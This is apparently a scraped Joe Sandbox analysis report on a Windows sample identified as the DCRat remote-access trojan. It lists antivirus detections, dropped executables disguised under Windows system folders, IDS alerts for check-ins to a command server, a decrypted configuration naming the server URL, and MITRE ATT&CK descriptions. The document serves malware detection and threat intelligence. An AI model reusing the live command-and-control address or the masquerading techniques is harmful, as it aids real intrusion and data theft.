Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc960756847011f46dc36691ebb9bf00d64170701a821e79703c128533db9791
Instruction ID: cf872cfedb85781231633e63d4bf17496d6efdc4381d4103571b2efb6e5aa414
Opcode Fuzzy Hash: dc960756847011f46dc36691ebb9bf00d64170701a821e79703c128533db9791
Instruction Fuzzy Hash: E6E06531F0A51D4FE7A4EB88C8712FD32A2EF99340F814175E41E972E2CD762A418B40

Function 00007FFD9BAC19ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2527542186.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
Instruction ID: 2f1b9ff46708b12732a2b43872c50fd887aefb8acbb8535ae55448ab5000a9c0
Opcode Fuzzy Hash: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
Instruction Fuzzy Hash: F3F07070F5E11D8AEB74ABF584557BC76B09F25301F71007AD00D931A2DE7856809F00

Function 00007FFD9BAA6B59 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2527542186.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
Instruction ID: abdac159f6c08fbc1b0a386664337e12690c34e4954035d4909e8744cfb652fc
Opcode Fuzzy Hash: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
Instruction Fuzzy Hash: 82E0E631E1556C49DBA5DB10C855AED73B1EF54301F4545F7800EB1595DDB456858F00

Function 00007FFD9BAA70E6 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2527542186.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
Instruction ID: cd62c3e12d236e361688b6287dc5b3c2067a81a682d38567e014dd985994d6a6
Opcode Fuzzy Hash: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
Instruction Fuzzy Hash: 3DE01270A0A51A8AFB349B54C8583ACB3B1EF85300F1040B8C10E633D1CE781A80CF15

Source: C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\UserOOBEBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Code function: 4x nop then jmp 00007FFD9BAC20B6h	0_2_00007FFD9BAB085C
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAC20B6h	5_2_00007FFD9BAC1EAE
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAD20B6h	11_2_00007FFD9BAC0862
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAD20B6h	18_2_00007FFD9BAD1EAE
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAC20B6h	23_2_00007FFD9BAC1EAE
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAB20B6h	28_2_00007FFD9BAA0862
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAE20B6h	33_2_00007FFD9BAD0862
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAC20B6h	43_2_00007FFD9BAC1F21
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAB20B6h	48_2_00007FFD9BAB1EAE
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAE20B6h	54_2_00007FFD9BAE1EAE
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 4x nop then jmp 00007FFD9BAC20B6h	59_2_00007FFD9BAC1EAE

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49799 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49838 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49742 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49879 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49949 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49990 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50013 -> 206.188.197.24:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50014 -> 206.188.197.24:80

Source: C:\Recovery\UserOOBEBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Joe Sandbox ML: detected

Source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/","LinejsProcessauthFlowerTestLocal"]]

Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24
Source: unknown	TCP traffic detected without corresponding DNS query: 206.188.197.24

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OH6KO8NBy1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows NT\Accessories\en-GB\1a5d5b8dcee3d8

C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe

C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe:Zone.Identifier

C:\Program Files\Uninstall Information\3569ad0d0ffd50

C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe:Zone.Identifier

C:\Program Files\Windows NT\TableTextService\en-US\3569ad0d0ffd50

C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe:Zone.Identifier

C:\Program Files\Windows Security\BrowserCore\en-US\3569ad0d0ffd50

C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe:Zone.Identifier

C:\Recovery\7ccfebd9e92364

Windows Analysis Report
OH6KO8NBy1.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre